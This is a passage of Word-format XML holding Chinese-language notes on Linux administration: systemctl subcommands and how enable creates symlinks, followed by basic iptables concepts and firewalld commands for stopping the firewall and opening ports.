    <w:p w14:paraId="2D95E782" w14:textId="6CFCEB8F" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>is-enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：开机时有没有默认要启用这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1786FA" w14:textId="3DE5B699" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：不要被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个名字吓着了，它其实是向运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进程发送信号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE2374" w14:textId="309AE9EB" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9DA47F" w14:textId="420CAA26" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：注销</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，注销后你就无法启动这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880A7D1" w14:textId="6FE45DC5" w:rsidR="00E43D96" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unmask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：取消对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的注销。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE3452" w14:textId="1B59FB0B" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4686D500" w14:textId="17684F34" w:rsidR="00CD3C46" w:rsidRDefault="00CD3C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> disable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9FEC1" w14:textId="17B333B1" w:rsidR="00CD3C46" w:rsidRDefault="00CD3C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如我们为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> etcd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务创建了配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /lib/systemd/system/etcd.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660092E3" w14:textId="0926EFAB" w:rsidR="00384EE1" w:rsidRDefault="00CD3C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006649D4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl enable etcd.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C53AAE" w14:textId="7A8F8B5D" w:rsidR="00874C2F" w:rsidRDefault="00874C2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006649D4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>httpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608387AE" w14:textId="0651F447" w:rsidR="00384EE1" w:rsidRDefault="00CD3C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所谓的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> multi-user.target.wants </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面创建了一个链接文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA158C6" w14:textId="1634DC22" w:rsidR="00384EE1" w:rsidRDefault="00CD3C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至于为什么会链接到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> multi-user.target.wants </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，则是由</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> etcd.server </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的配置信息决定的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D24AF" w14:textId="3E56CAFE" w:rsidR="00603E91" w:rsidRDefault="00603E91" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的命令相当于在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/systemd/system</w:t>
      </w:r>
      <w:r w:rsidR="006649D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006649D4" w:rsidRPr="00CD3C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multi-user.target.wants</w:t>
      </w:r>
      <w:r w:rsidR="008D4B4F">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加一个符号链接，指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/usr/lib/systemd/system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpd.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F530DB" w14:textId="77777777" w:rsidR="00603E91" w:rsidRDefault="00603E91" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E40188" w14:textId="47600EE2" w:rsidR="00384EE1" w:rsidRDefault="00603E91" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是因为开机时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/systemd/system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录里面的配置文件。这也意味着，如果把修改后的配置文件放在该目录，就可以达到覆盖原始配置的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08766B" w14:textId="6EB3D5D6" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041F7353" w14:textId="4597DEF0" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E508855" w14:textId="228B1B58" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA4B930" w14:textId="77777777" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A25399" w14:textId="5C65FAA2" w:rsidR="006A4B20" w:rsidRDefault="006A4B20" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc159779687"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="4F4D0905" w14:textId="595FDB6F" w:rsidR="00C806B4" w:rsidRDefault="00C806B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D720A43" w14:textId="4965E0B6" w:rsidR="00C806B4" w:rsidRDefault="00C806B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里主要说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，两者安装其一即可，都安装的话会冲突</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A9024" w14:textId="67288FBD" w:rsidR="003D4498" w:rsidRDefault="003D4498" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1F3D9F" w14:textId="3B8BCF2F" w:rsidR="003D4498" w:rsidRDefault="003D4498" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D98106B" w14:textId="371F4AEE" w:rsidR="003D4498" w:rsidRDefault="003D4498" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30B74D" w14:textId="77777777" w:rsidR="00994B3C" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个通过控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> netfilter </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块来管理网络数据包的流动与转送的应用软件，其功能包括不仅仅包括防火墙的控制出入流量，还有端口转发等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07504A99" w14:textId="77777777" w:rsidR="00994B3C" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部有</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> chains</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>规则</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这三种概念。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FBB8B0" w14:textId="4C161C80" w:rsidR="003D4498" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">iptables </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的每一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“表”</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都和不同的数据包处理有关、决定数据包是否可以穿越的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“链”、而一条</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“规则”</w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994B3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在链里面则可以决定是否送往下一条链（或其它的动作）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F644C8E" w14:textId="473C171A" w:rsidR="00DE0DC2" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674F2D64" w14:textId="77777777" w:rsidR="00DE0DC2" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F86AD48" w14:textId="3CB25CC7" w:rsidR="00DE0DC2" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219E0BEC" w14:textId="77777777" w:rsidR="00DE0DC2" w:rsidRPr="00C806B4" w:rsidRDefault="00DE0DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236B1CD7" w14:textId="315FF5CF" w:rsidR="006A4B20" w:rsidRDefault="006A4B20" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firewalld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7073EEC0" w14:textId="43C302B9" w:rsidR="006A4B20" w:rsidRDefault="006A4B20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494DBFB3" w14:textId="3AB7CBC1" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>almaLinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>centos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewalld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为防火墙，区别于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为防火墙。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4267E6" w14:textId="3A101CF7" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭防火墙可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>systemctl stop firewalld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">systemctl disable firewalld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C5D3B" w14:textId="2BA17B19" w:rsidR="006A4B20" w:rsidRDefault="006A4B20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDAEF2A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>firewall-cmd --permanent --add-port=51080/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615ED9C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@vultr ~]# firewall-cmd --list-ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20779DDF" w14:textId="62493ADC" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>50022/tcp 51080/tcp 38388/tcp 38388/udp 23307/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F9F40" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFACFFA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14587DC4" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
